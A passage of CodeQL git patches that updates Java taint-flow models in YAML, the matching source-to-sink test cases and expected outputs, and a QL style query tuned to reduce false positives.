IllegalArgumentException((String)source()); - sink((String)e3.getMessage()); // $hasValueFlow + Exception e3 = new IllegalArgumentException((String)source()); + sink((String)e3.getMessage()); // $hasValueFlow - Exception e4 = new IllegalStateException((String)source()); - sink((String)e4.getMessage()); // $hasValueFlow + Exception e4 = new IllegalStateException((String)source()); + sink((String)e4.getMessage()); // $hasValueFlow - Throwable t = new Throwable((Throwable)source()); - sink((Throwable)t.getCause()); // $hasValueFlow + Throwable t = new Throwable((Throwable)source()); + sink((Throwable)t.getCause()); // $hasValueFlow - Integer x = (Integer)source(); - int y = x; - sink(String.valueOf(y)); // $hasTaintFlow + Integer x = (Integer)source(); + int y = x; + sink(String.valueOf(y)); // $hasTaintFlow - String s1 = (String)source(); - sink(Integer.parseInt(s1)); // $hasTaintFlow + String s1 = (String)source(); + sink(Integer.parseInt(s1)); // $hasTaintFlow - String s2 = (String)source(); - int i = 0; - sink(s2.charAt(i)); // $hasTaintFlow + String s2 = (String)source(); + int i = 0; + sink(s2.charAt(i)); // $hasTaintFlow - String s3 = (String)source(); - sink(new BigDecimal(s3)); // $hasTaintFlow + String s3 = (String)source(); + sink(new BigDecimal(s3)); // $hasTaintFlow - ResultSet rs = (ResultSet)source(); - sink(rs.getString("")); // $hasTaintFlow + ResultSet rs = (ResultSet)source(); + sink(rs.getString("")); // $hasTaintFlow + } + + // top 200 JDK APIs tests + { + // java.io + Exception e1 = new IOException((String)source()); + sink((String)e1.getMessage()); // $hasValueFlow + + // java.lang + Exception e2 = new Exception((String)source()); + sink((String)e2.getMessage()); // $hasValueFlow + + Exception e3 = new IndexOutOfBoundsException((String)source()); + sink((String)e3.getMessage()); // $hasValueFlow + + Exception e4 = new RuntimeException((String)source(), (Throwable)source()); + sink((String)e4.getMessage()); // $hasValueFlow + sink((Throwable)e4.getCause()); // $hasValueFlow + + Integer i1 = (Integer)source(); + sink(i1.intValue()); // $hasTaintFlow + + int i2 = (int)source(); + sink(Integer.toString(i2)); // $hasTaintFlow + + int i3 = (int)source(); + sink(Integer.valueOf(i3)); // $hasTaintFlow + + Long l1 = (Long)source(); + sink(l1.longValue()); // $hasTaintFlow + + String s1 = (String)source(); + sink(Long.parseLong(s1)); // $hasTaintFlow + + Long l2 = (Long)source(); + sink(l2.toString()); // $hasTaintFlow + + long l3 = (long)source(); + sink(String.valueOf(l3)); // $hasTaintFlow + + // System sys = (System)source(); + // sink(sys.getProperty("")); // $hasValueFlow + + // java.math + long l4 = (long)source(); + sink(BigDecimal.valueOf(l4)); // $hasTaintFlow + + double d1 = (double)source(); + sink(BigDecimal.valueOf(d1)); // $hasTaintFlow + + int i4 = (int)source(); + int i5 = (int)source(); + sink(Math.min(i4, i5)); // $hasValueFlow + + // java.sql + // Connection con = DriverManager.getConnection(""); + // PreparedStatement ps = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); + // ps.setString(1, "testName"); // $hasValueFlow + // ps.setInt(2, 110592); // $hasValueFlow + + ResultSet rs = (ResultSet)source(); + sink(rs.getInt("")); // $hasTaintFlow + + // java.util.concurrent.atomic + // AtomicInteger ai = new AtomicInteger((int)source()); + // sink((int)ai.get()); // $hasValueFlow + + // AtomicReference ar = new AtomicReference(source()); + // sink(ar.get()); // $hasValueFlow + + // java.util.concurrent + CountDownLatch cdl = new CountDownLatch((int)source()); + sink(cdl.getCount()); // $hasValueFlow + + // java.util.function + // Function func = a -> a + ""; + // sink(func.apply(source())); // $hasTaintFlow + + Supplier sup = (Supplier)source(); + sink(sup.get()); // $hasValueFlow + + // java.util + // StringJoiner sj = new StringJoiner(","); + // sink(sj.add((CharSequence)source())); // $hasTaintFlow + } } } From 36ca97e4f607c9ec787bed47fbfdd99b25c04bc6 Mon Sep 17 00:00:00 2001 From: Tony Torralba Date: Thu, 22 Dec 2022 11:15:07 +0100 Subject: [PATCH 066/381] Add exclusions to reduce FP Predicate parameters that have a database type are excluded. Also, uses of the exists variable in an agreggation or another quantifier are excluded. --- ql/ql/src/queries/style/OmittableExists.ql | 16 +++++++++++++--- .../OmittableExists/OmittableExists.expected | 2 +- .../test/queries/style/OmittableExists/Test.qll | 16 ++++++++++++++++ 3 files changed, 30 insertions(+), 4 deletions(-) diff --git a/ql/ql/src/queries/style/OmittableExists.ql b/ql/ql/src/queries/style/OmittableExists.ql index f3a3406c1f2..c6e47c260df 100644 --- a/ql/ql/src/queries/style/OmittableExists.ql +++ b/ql/ql/src/queries/style/OmittableExists.ql @@ -10,12 +10,22 @@ import ql +class AggregateOrForQuantifier extends AstNode { + AggregateOrForQuantifier() { + this instanceof FullAggregate or this instanceof Forex or this instanceof Forall + } +} + from VarDecl existsArgument, VarAccess use where existsArgument = any(Exists e).getAnArgument() and use = unique( | | existsArgument.getAnAccess()) and - exists(Call c, int argPos | c.getArgument(argPos) = use | - existsArgument.getType() = c.getTarget().getParameterType(argPos).getASuperType*() - ) + exists(Call c, int argPos, Type paramType | + c.getArgument(argPos) = use and paramType = c.getTarget().getParameterType(argPos) + | + existsArgument.getType() = paramType.getASuperType*() and + not paramType instanceof DatabaseType + ) and + not use.getParent*() instanceof AggregateOrForQuantifier select existsArgument, "This exists variable can be omitted by using a don't-care expression $@.", use, "in this argument" diff --git a/ql/ql/test/queries/style/OmittableExists/OmittableExists.expected b/ql/ql/test/queries/style/OmittableExists/OmittableExists.expected index 3031b67920f..7062471b7fb 100644 --- a/ql/ql/test/queries/style/OmittableExists/OmittableExists.expected +++ b/ql/ql/test/queries/style/OmittableExists/OmittableExists.expected @@ -1 +1 @@ -| Test.qll:10:10:10:14 | i | This exists variable can be omitted by using a don't-care expression $@. | Test.qll:10:29:10:29 | i | in this argument | +| Test.qll:18:10:18:14 | i | This exists variable can be omitted by using a don't-care expression $@. | Test.qll:18:29:18:29 | i | in this argument | diff --git a/ql/ql/test/queries/style/OmittableExists/Test.qll b/ql/ql/test/queries/style/OmittableExists/Test.qll index 7852d11d7a6..f9809b9d485 100644 --- a/ql/ql/test/queries/style/OmittableExists/Test.qll +++ b/ql/ql/test/queries/style/OmittableExists/Test.qll @@ -2,10 +2,18 @@ predicate aPredicate(int i) { none() } predicate anotherPredicate(int i) { none() } +predicate yetAnotherPredicate(int i, int y) { none() } + +predicate dbTypePredicate(@location l) { none() } + class SmallInt extends int { SmallInt() { this = [0 .. 10] } } +class Location extends @location { + string toString() { result = "" } +} + predicate test() { exists(int i | aPredicate(i)) // BAD or @@ -15,5 +23,13 @@ predicate test() { or exists(int i | aPredicate(i) and exists(int i2 | i = i2)) // GOOD or + exists(int i | count(int y | yetAnotherPredicate(i, y)) > 0) // GOOD + or + exists(int i | forex(int y | yetAnotherPredicate(i, y))) // GOOD + or + exists(int i | forall(int y | yetAnotherPredicate(i, y))) // GOOD + or exists(SmallInt i | aPredicate(i)) // GOOD + or + exists(Location l | dbTypePredicate(l)) // GOOD } From 6007827dd3b6f595183dc9e2d8c45db65b34f316 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Thu, 22 Dec 2022 12:29:57 -0500 Subject: [PATCH 067/381] Java: update test cases --- java/ql/lib/ext/java.lang.model.yml | 2 +- java/ql/lib/ext/java.sql.model.yml | 4 +- .../ext/java.util.concurrent.atomic.model.yml | 2 + java/ql/lib/ext/java.util.model.yml | 3 +- java/ql/test/ext/TestModels/Test.java | 37 +++++++++++-------- 5 files changed, 28 insertions(+), 20 deletions(-) diff --git a/java/ql/lib/ext/java.lang.model.yml b/java/ql/lib/ext/java.lang.model.yml index a2f8fd3c65e..a114eb21228 100644 --- a/java/ql/lib/ext/java.lang.model.yml +++ b/java/ql/lib/ext/java.lang.model.yml @@ -103,7 +103,6 @@ extensions: - ["java.lang", "StringBuffer", True, "StringBuffer", "(String)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["java.lang", "StringBuilder", True, "StringBuilder", "", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["java.lang", "System", False, "arraycopy", "", "", "Argument[0]", "Argument[2]", "taint", "manual"] - - ["java.lang", "System", False, "getProperty", "(String)", "", "Argument[-1].MapValue", "ReturnValue", "value", "manual"] - ["java.lang", "Throwable", False, "Throwable", "(Throwable)", "", "Argument[0]", "Argument[-1].SyntheticField[java.lang.Throwable.cause]", "value", "manual"] - ["java.lang", "Throwable", True, "getCause", "()", "", "Argument[-1].SyntheticField[java.lang.Throwable.cause]", "ReturnValue", "value", "manual"] - ["java.lang", "Throwable", True, "getMessage", "()", "", "Argument[-1].SyntheticField[java.lang.Throwable.message]", "ReturnValue", "value", "manual"] @@ -137,6 +136,7 @@ extensions: - ["java.lang", "String", "length", "()", "manual"] - ["java.lang", "String", "startsWith", "(String)", "manual"] - ["java.lang", "System", "currentTimeMillis", "()", "manual"] + - ["java.lang", "System", "getProperty", "(String)", "manual"] - ["java.lang", "System", "nanoTime", "()", "manual"] - ["java.lang", "Thread", "currentThread", "()", "manual"] - ["java.lang", "Thread", "sleep", "(long)", "manual"] diff --git a/java/ql/lib/ext/java.sql.model.yml b/java/ql/lib/ext/java.sql.model.yml index 83fe8f73c02..9dd0e7d948c 100644 --- a/java/ql/lib/ext/java.sql.model.yml +++ b/java/ql/lib/ext/java.sql.model.yml @@ -19,8 +19,8 @@ extensions: pack: codeql/java-all extensible: summaryModel data: - - ["java.sql", "PreparedStatement", True, "setInt", "(int,int)", "", "Argument[1]", "Argument[-1].Parameter[Argument[0]]", "value", "manual"] # ! fix output - - ["java.sql", "PreparedStatement", True, "setString", "(int,String)", "", "Argument[1]", "Argument[-1].Parameter[Argument[0]]", "value", "manual"] # ! fix output + - ["java.sql", "PreparedStatement", True, "setInt", "(int,int)", "", "Argument[1]", "Argument[-1]", "value", "manual"] + - ["java.sql", "PreparedStatement", True, "setString", "(int,String)", "", "Argument[1]", "Argument[-1]", "value", "manual"] - ["java.sql", "ResultSet", True, "getInt", "(String)", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["java.sql", "ResultSet", True, "getString", "(String)", "", "Argument[-1]", "ReturnValue", "taint", "manual"] diff --git a/java/ql/lib/ext/java.util.concurrent.atomic.model.yml b/java/ql/lib/ext/java.util.concurrent.atomic.model.yml index bf56a6dbb92..4dc1318c4d8 100644 --- a/java/ql/lib/ext/java.util.concurrent.atomic.model.yml +++ b/java/ql/lib/ext/java.util.concurrent.atomic.model.yml @@ -3,5 +3,7 @@ extensions: pack: codeql/java-all extensible: summaryModel data: + - ["java.util.concurrent.atomic", "AtomicInteger", False, "AtomicInteger", "(int)", "", "Argument[0]", "Argument[-1].SyntheticField[java.util.concurrent.atomic.AtomicInteger.value]", "value", "manual"] - ["java.util.concurrent.atomic", "AtomicInteger", False, "get", "()", "", "Argument[-1].SyntheticField[java.util.concurrent.atomic.AtomicInteger.value]", "ReturnValue", "value", "manual"] + - ["java.util.concurrent.atomic", "AtomicReference", False, "AtomicReference", "(Object)", "", "Argument[0]", "Argument[-1].SyntheticField[java.util.concurrent.atomic.AtomicReference.value]", "value", "manual"] - ["java.util.concurrent.atomic", "AtomicReference", False, "get", "()", "", "Argument[-1].SyntheticField[java.util.concurrent.atomic.AtomicReference.value]", "ReturnValue", "value", "manual"] diff --git a/java/ql/lib/ext/java.util.model.yml b/java/ql/lib/ext/java.util.model.yml index 224a425a8d8..ec45266409a 100644 --- a/java/ql/lib/ext/java.util.model.yml +++ b/java/ql/lib/ext/java.util.model.yml @@ -335,7 +335,8 @@ extensions: - ["java.util", "Stack", True, "peek", "()", "", "Argument[-1].Element", "ReturnValue", "value", "manual"] - ["java.util", "Stack", True, "pop", "()", "", "Argument[-1].Element", "ReturnValue", "value", "manual"] - ["java.util", "Stack", True, "push", "(Object)", "", "Argument[0]", "Argument[-1].Element", "value", "manual"] - - ["java.util", "StringJoiner", False, "add", "(CharSequence)", "", "Argument[0]", "Argument[-1].Element", "value", "manual"] + - ["java.util", "StringJoiner", False, "add", "(CharSequence)", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["java.util", "StringJoiner", False, "add", "(CharSequence)", "", "Argument[0]", "ReturnValue", "taint", "manual"] - ["java.util", "StringTokenizer", False, "StringTokenizer", "", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["java.util", "StringTokenizer", False, "nextElement", "()", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["java.util", "StringTokenizer", False, "nextToken", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] diff --git a/java/ql/test/ext/TestModels/Test.java b/java/ql/test/ext/TestModels/Test.java index 50558b89ac0..68d9e669e22 100644 --- a/java/ql/test/ext/TestModels/Test.java +++ b/java/ql/test/ext/TestModels/Test.java @@ -92,9 +92,6 @@ public class Test { long l3 = (long)source(); sink(String.valueOf(l3)); // $hasTaintFlow - // System sys = (System)source(); - // sink(sys.getProperty("")); // $hasValueFlow - // java.math long l4 = (long)source(); sink(BigDecimal.valueOf(l4)); // $hasTaintFlow @@ -107,36 +104,44 @@ public class Test { sink(Math.min(i4, i5)); // $hasValueFlow // java.sql - // Connection con = DriverManager.getConnection(""); - // PreparedStatement ps = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); - // ps.setString(1, "testName"); // $hasValueFlow - // ps.setInt(2, 110592); // $hasValueFlow + Connection con = DriverManager.getConnection(""); + PreparedStatement ps1 = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); + ps1.setString(1, (String)source()); + sink(ps1); // $hasValueFlow + PreparedStatement ps2 = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); + ps2.setInt(2, (int)source()); + sink(ps2); // $hasValueFlow ResultSet rs = (ResultSet)source(); sink(rs.getInt("")); // $hasTaintFlow // java.util.concurrent.atomic - // AtomicInteger ai = new AtomicInteger((int)source()); - // sink((int)ai.get()); // $hasValueFlow + AtomicInteger ai = new AtomicInteger((int)source()); + sink(ai.get()); // $hasValueFlow - // AtomicReference ar = new AtomicReference(source()); - // sink(ar.get()); // $hasValueFlow + AtomicReference ar = new AtomicReference(source()); + sink(ar.get()); // $hasValueFlow // java.util.concurrent CountDownLatch cdl = new CountDownLatch((int)source()); sink(cdl.getCount()); // $hasValueFlow // java.util.function - // Function func = a -> a + ""; - // sink(func.apply(source())); // $hasTaintFlow + Function func = a -> a + ""; + sink(func.apply(source())); // $hasTaintFlow + + Function half = a -> a / 2.0; + sink(half.apply((Integer)source())); // $hasTaintFlow Supplier sup = (Supplier)source(); sink(sup.get()); // $hasValueFlow // java.util - // StringJoiner sj = new StringJoiner(","); - // sink(sj.add((CharSequence)source())); // $hasTaintFlow - } + StringJoiner sj1 = new StringJoiner(","); + sink(sj1.add((CharSequence)source())); // $hasTaintFlow + StringJoiner sj2 = (StringJoiner)source(); + sink(sj2.add("test")); // $hasTaintFlow + } } } From 997219a28014df6cc4e7d707e9a6ad4a43555ebf Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Thu, 22 Dec 2022 12:54:02 -0500 Subject: [PATCH 068/381] Java: update test case affected by Class.isAssignableFrom neutral model --- .../query-tests/Telemetry/UnsupportedExternalAPIs/Test.java | 2 +- .../UnsupportedExternalAPIs/UnsupportedExternalAPIs.expected | 1 - 2 files changed, 1 insertion(+), 2 deletions(-) diff --git a/java/ql/test/query-tests/Telemetry/UnsupportedExternalAPIs/Test.java b/java/ql/test/query-tests/Telemetry/UnsupportedExternalAPIs/Test.java index 77cac5ab620..f0e3926c7e9 100644 --- a/java/ql/test/query-tests/Telemetry/UnsupportedExternalAPIs/Test.java +++ b/java/ql/test/query-tests/Telemetry/UnsupportedExternalAPIs/Test.java @@ -18,7 +18,7 @@ class ExternalApiUsage { AtomicReference ref = new AtomicReference<>(); // not supported ref.set("foo"); - String.class.isAssignableFrom(Object.class); // parameter with generic type + String.class.isAssignableFrom(Object.class); // parameter with generic type, supported as a neutral model System.out.println(d); System.out.println(map); diff --git a/java/ql/test/query-tests/Telemetry/UnsupportedExternalAPIs/UnsupportedExternalAPIs.expected b/java/ql/test/query-tests/Telemetry/UnsupportedExternalAPIs/UnsupportedExternalAPIs.expected index f9dea6375e3..7bab3b2d75a 100644 --- a/java/ql/test/query-tests/Telemetry/UnsupportedExternalAPIs/UnsupportedExternalAPIs.expected +++ b/java/ql/test/query-tests/Telemetry/UnsupportedExternalAPIs/UnsupportedExternalAPIs.expected @@ -1,3 +1,2 @@ -| java.lang.Class#isAssignableFrom(Class) | 1 | | java.time.Duration#ofMillis(long) | 1 | | java.util.concurrent.atomic.AtomicReference#set(Object) | 1 | From e6331dc2e652ac975d98f463a216f9b3b6d7047c Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Thu, 22 Dec 2022 12:57:37 -0500 Subject: [PATCH 069/381] Java: update test case affected by Long.parseLong summary model --- .../CWE-681/semmle/tests/NumericCastTaintedLocal.expected | 3 +++ 1 file changed, 3 insertions(+) diff --git a/java/ql/test/query-tests/security/CWE-681/semmle/tests/NumericCastTaintedLocal.expected b/java/ql/test/query-tests/security/CWE-681/semmle/tests/NumericCastTaintedLocal.expected index 6ab99919c33..7a9330e8220 100644 --- a/java/ql/test/query-tests/security/CWE-681/semmle/tests/NumericCastTaintedLocal.expected +++ b/java/ql/test/query-tests/security/CWE-681/semmle/tests/NumericCastTaintedLocal.expected @@ -4,7 +4,9 @@ edges | Test.java:11:28:11:36 | System.in : InputStream | Test.java:11:6:11:46 | new InputStreamReader(...) : InputStreamReader | | Test.java:12:26:12:39 | readerBuffered : BufferedReader | Test.java:12:26:12:50 | readLine(...) : String | | Test.java:12:26:12:50 | readLine(...) : String | Test.java:14:27:14:38 | stringNumber : String | +| Test.java:14:12:14:46 | parseLong(...) : Number | Test.java:21:22:21:25 | data | | Test.java:14:27:14:38 | stringNumber : String | Test.java:14:27:14:45 | trim(...) : String | +| Test.java:14:27:14:45 | trim(...) : String | Test.java:14:12:14:46 | parseLong(...) : Number | | Test.java:14:27:14:45 | trim(...) : String | Test.java:21:22:21:25 | data | nodes | Test.java:10:36:11:47 | new BufferedReader(...) : BufferedReader | semmle.label | new BufferedReader(...) : BufferedReader | @@ -12,6 +14,7 @@ nodes | Test.java:11:28:11:36 | System.in : InputStream | semmle.label | System.in : InputStream | | Test.java:12:26:12:39 | readerBuffered : BufferedReader | semmle.label | readerBuffered : BufferedReader | | Test.java:12:26:12:50 | readLine(...) : String | semmle.label | readLine(...) : String | +| Test.java:14:12:14:46 | parseLong(...) : Number | semmle.label | parseLong(...) : Number | | Test.java:14:27:14:38 | stringNumber : String | semmle.label | stringNumber : String | | Test.java:14:27:14:45 | trim(...) : String | semmle.label | trim(...) : String | | Test.java:21:22:21:25 | data | semmle.label | data | From a81c54b58ca23f8ff5f9b187bed0ff28b6ae4485 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Thu, 22 Dec 2022 13:22:12 -0500 Subject: [PATCH 070/381] Java: updates to order alphabetically --- java/ql/lib/ext/java.lang.model.yml | 8 +++--- java/ql/lib/ext/java.math.model.yml | 2 +- java/ql/test/ext/TestModels/Test.java | 14 +++++----- .../test/ext/TopJdkApis/TopJdkApisTest.java | 28 +++++++++---------- 4 files changed, 26 insertions(+), 26 deletions(-) diff --git a/java/ql/lib/ext/java.lang.model.yml b/java/ql/lib/ext/java.lang.model.yml index a114eb21228..fe0cd23ef6d 100644 --- a/java/ql/lib/ext/java.lang.model.yml +++ b/java/ql/lib/ext/java.lang.model.yml @@ -38,13 +38,13 @@ extensions: - ["java.lang", "CharSequence", True, "subSequence", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["java.lang", "CharSequence", True, "toString", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["java.lang", "Exception", False, "Exception", "(String)", "", "Argument[0]", "Argument[-1].SyntheticField[java.lang.Throwable.message]", "value", "manual"] - - ["java.lang", "IndexOutOfBoundsException", False, "IndexOutOfBoundsException", "(String)", "", "Argument[0]", "Argument[-1].SyntheticField[java.lang.Throwable.message]", "value", "manual"] - - ["java.lang", "Integer", False, "intValue", "()", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - - ["java.lang", "Integer", False, "toString", "(int)", "", "Argument[0]", "ReturnValue", "taint", "manual"] - - ["java.lang", "Integer", False, "valueOf", "(int)", "", "Argument[0]", "ReturnValue", "taint", "manual"] - ["java.lang", "IllegalArgumentException", False, "IllegalArgumentException", "(String)", "", "Argument[0]", "Argument[-1].SyntheticField[java.lang.Throwable.message]", "value", "manual"] - ["java.lang", "IllegalStateException", False, "IllegalStateException", "(String)", "", "Argument[0]", "Argument[-1].SyntheticField[java.lang.Throwable.message]", "value", "manual"] + - ["java.lang", "IndexOutOfBoundsException", False, "IndexOutOfBoundsException", "(String)", "", "Argument[0]", "Argument[-1].SyntheticField[java.lang.Throwable.message]", "value", "manual"] + - ["java.lang", "Integer", False, "intValue", "()", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["java.lang", "Integer", False, "parseInt", "(String)", "", "Argument[0]", "ReturnValue", "taint", "manual"] + - ["java.lang", "Integer", False, "toString", "(int)", "", "Argument[0]", "ReturnValue", "taint", "manual"] + - ["java.lang", "Integer", False, "valueOf", "(int)", "", "Argument[0]", "ReturnValue", "taint", "manual"] - ["java.lang", "Iterable", True, "forEach", "(Consumer)", "", "Argument[-1].Element", "Argument[0].Parameter[0]", "value", "manual"] - ["java.lang", "Iterable", True, "iterator", "()", "", "Argument[-1].Element", "ReturnValue.Element", "value", "manual"] - ["java.lang", "Iterable", True, "spliterator", "()", "", "Argument[-1].Element", "ReturnValue.Element", "value", "manual"] diff --git a/java/ql/lib/ext/java.math.model.yml b/java/ql/lib/ext/java.math.model.yml index 1dc8b8b0eea..8181f8e4861 100644 --- a/java/ql/lib/ext/java.math.model.yml +++ b/java/ql/lib/ext/java.math.model.yml @@ -4,8 +4,8 @@ extensions: extensible: summaryModel data: - ["java.math", "BigDecimal", False, "BigDecimal", "(String)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - - ["java.math", "BigDecimal", False, "valueOf", "(long)", "", "Argument[0]", "ReturnValue", "taint", "manual"] # ! consider making this signatureless and merging with the below line instead - ["java.math", "BigDecimal", False, "valueOf", "(double)", "", "Argument[0]", "ReturnValue", "taint", "manual"] + - ["java.math", "BigDecimal", False, "valueOf", "(long)", "", "Argument[0]", "ReturnValue", "taint", "manual"] # ! consider making this signatureless and merging with the above line instead - ["java.lang", "Math", False, "min", "(int,int)", "", "Argument[0..1]", "ReturnValue", "value", "manual"] - addsTo: diff --git a/java/ql/test/ext/TestModels/Test.java b/java/ql/test/ext/TestModels/Test.java index 68d9e669e22..a39cec4af62 100644 --- a/java/ql/test/ext/TestModels/Test.java +++ b/java/ql/test/ext/TestModels/Test.java @@ -1,15 +1,15 @@ -import java.sql.PreparedStatement; -import java.sql.DriverManager; -import java.sql.Connection; -import java.sql.ResultSet; -import java.math.BigDecimal; import java.io.IOException; +import java.math.BigDecimal; +import java.sql.Connection; +import java.sql.DriverManager; +import java.sql.PreparedStatement; +import java.sql.ResultSet; +import java.util.StringJoiner; +import java.util.concurrent.CountDownLatch; import java.util.concurrent.atomic.AtomicInteger; import java.util.concurrent.atomic.AtomicReference; -import java.util.concurrent.CountDownLatch; import java.util.function.Function; import java.util.function.Supplier; -import java.util.StringJoiner; public class Test { diff --git a/java/ql/test/ext/TopJdkApis/TopJdkApisTest.java b/java/ql/test/ext/TopJdkApis/TopJdkApisTest.java index 4b7e60c6c9e..49a7396ad64 100644 --- a/java/ql/test/ext/TopJdkApis/TopJdkApisTest.java +++ b/java/ql/test/ext/TopJdkApis/TopJdkApisTest.java @@ -1,27 +1,27 @@ +import java.io.ByteArrayInputStream; +import java.lang.IllegalStateException; +import java.lang.IndexOutOfBoundsException; +import java.lang.Math; +import java.lang.System; +import java.math.BigDecimal; +import java.nio.file.Paths; +import java.sql.ResultSet; +import java.text.DateFormat; +import java.text.SimpleDateFormat; import java.util.ArrayList; import java.util.Arrays; import java.util.Collections; -import java.util.Objects; -import java.util.UUID; -import java.util.stream.Collectors; -import java.util.Map; import java.util.HashMap; import java.util.HashSet; +import java.util.Map; +import java.util.Objects; import java.util.StringJoiner; +import java.util.UUID; import java.util.concurrent.CountDownLatch; import java.util.concurrent.atomic.AtomicInteger; import java.util.concurrent.atomic.AtomicReference; import java.util.regex.Matcher; import java.util.regex.Pattern; -import java.math.BigDecimal; -import java.sql.ResultSet; -import java.lang.System; -import java.lang.IllegalStateException; -import java.lang.IndexOutOfBoundsException; -import java.lang.Math; -import java.io.ByteArrayInputStream; -import java.nio.file.Paths; -import java.text.DateFormat; -import java.text.SimpleDateFormat; +import java.util.stream.Collectors; public class TopJdkApisTest { } From 673d37cc3d111ee51dbdfa5d7a5751f822ba3561 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Thu, 22 Dec 2022 14:36:06 -0500 Subject: [PATCH 071/381] Java: update Math.min test case --- java/ql/test/ext/TestModels/Test.java | 2 ++ 1 file changed, 2 insertions(+) diff --git a/java/ql/test/ext/TestModels/Test.java b/java/ql/test/ext/TestModels/Test.java index a39cec4af62..bfdbe6a6a27 100644 --- a/java/ql/test/ext/TestModels/Test.java +++ b/java/ql/test/ext/TestModels/Test.java @@ -102,6 +102,8 @@ public class Test { int i4 = (int)source(); int i5 = (int)source(); sink(Math.min(i4, i5)); // $hasValueFlow + sink(Math.min(i4, 42)); // $hasValueFlow + sink(Math.min(42, i5)); // $hasValueFlow // java.sql Connection con = DriverManager.getConnection(""); From 939279af3844d825e4568cd87b5a05fa1f2e042a Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Thu, 22 Dec 2022 16:25:12 -0500 Subject: [PATCH 072/381] Java: add comments --- java/ql/lib/ext/java.io.model.yml | 2 +- java/ql/lib/ext/java.lang.model.yml | 12 ++++++------ java/ql/lib/ext/java.math.model.yml | 2 +- java/ql/lib/ext/java.sql.model.yml | 2 +- java/ql/lib/ext/java.text.model.yml | 4 ++-- java/ql/lib/ext/java.time.model.yml | 2 +- java/ql/lib/ext/java.util.function.model.yml | 4 ++-- java/ql/lib/ext/java.util.model.yml | 2 +- java/ql/lib/ext/java.util.stream.model.yml | 4 ++-- 9 files changed, 17 insertions(+), 17 deletions(-) diff --git a/java/ql/lib/ext/java.io.model.yml b/java/ql/lib/ext/java.io.model.yml index 94497412c07..f4e63b01c7f 100644 --- a/java/ql/lib/ext/java.io.model.yml +++ b/java/ql/lib/ext/java.io.model.yml @@ -91,4 +91,4 @@ extensions: extensible: neutralModel data: - ["java.io", "File", "exists", "()", "manual"] - - ["java.io", "File", "getName", "()", "manual"] # ! might need to double-check this one + - ["java.io", "File", "getName", "()", "manual"] # ! unsure if should be neutral model diff --git a/java/ql/lib/ext/java.lang.model.yml b/java/ql/lib/ext/java.lang.model.yml index fe0cd23ef6d..73ceaf88a8a 100644 --- a/java/ql/lib/ext/java.lang.model.yml +++ b/java/ql/lib/ext/java.lang.model.yml @@ -62,7 +62,7 @@ extensions: - ["java.lang", "String", False, "concat", "(String)", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["java.lang", "String", False, "concat", "(String)", "", "Argument[0]", "ReturnValue", "taint", "manual"] - ["java.lang", "String", False, "copyValueOf", "", "", "Argument[0]", "ReturnValue", "taint", "manual"] - - ["java.lang", "String", False, "endsWith", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["java.lang", "String", False, "endsWith", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] # ! why is this a summary model and not a neutral model instead? it returns a boolean - ["java.lang", "String", False, "format", "(Locale,String,Object[])", "", "Argument[1]", "ReturnValue", "taint", "manual"] - ["java.lang", "String", False, "format", "(Locale,String,Object[])", "", "Argument[2].ArrayElement", "ReturnValue", "taint", "manual"] - ["java.lang", "String", False, "format", "(String,Object[])", "", "Argument[0]", "ReturnValue", "taint", "manual"] @@ -113,7 +113,7 @@ extensions: data: - ["java.lang", "AbstractStringBuilder", "length", "()", "manual"] - ["java.lang", "Boolean", "equals", "(Object)", "manual"] - - ["java.lang", "Class", "getClassLoader", "()", "manual"] # ! might need to double-check this one + - ["java.lang", "Class", "getClassLoader", "()", "manual"] # ! unsure if should be neutral model - ["java.lang", "Class", "getName", "()", "manual"] - ["java.lang", "Class", "getSimpleName", "()", "manual"] - ["java.lang", "Class", "isAssignableFrom", "(Class)", "manual"] @@ -127,16 +127,16 @@ extensions: - ["java.lang", "Object", "hashCode", "()", "manual"] - ["java.lang", "Object", "toString", "()", "manual"] - ["java.lang", "String", "contains", "(CharSequence)", "manual"] - - ["java.lang", "String", "endsWith", "(String)", "manual"] + - ["java.lang", "String", "endsWith", "(String)", "manual"] # ! unsure if should be neutral model since already modeled as a summary above - ["java.lang", "String", "equals", "(Object)", "manual"] - ["java.lang", "String", "equalsIgnoreCase", "(String)", "manual"] - ["java.lang", "String", "hashCode", "()", "manual"] - - ["java.lang", "String", "indexOf", "(String)", "manual"] + - ["java.lang", "String", "indexOf", "(String)", "manual"] # ! unsure if should be neutral model, is flow through the param interesting in this case? - ["java.lang", "String", "isEmpty", "()", "manual"] - ["java.lang", "String", "length", "()", "manual"] - ["java.lang", "String", "startsWith", "(String)", "manual"] - ["java.lang", "System", "currentTimeMillis", "()", "manual"] - - ["java.lang", "System", "getProperty", "(String)", "manual"] + - ["java.lang", "System", "getProperty", "(String)", "manual"] # ! unsure if should be neutral model - ["java.lang", "System", "nanoTime", "()", "manual"] - ["java.lang", "Thread", "currentThread", "()", "manual"] - - ["java.lang", "Thread", "sleep", "(long)", "manual"] + - ["java.lang", "Thread", "sleep", "(long)", "manual"] # ! unsure if should be neutral model, is flow through the param interesting in this case? diff --git a/java/ql/lib/ext/java.math.model.yml 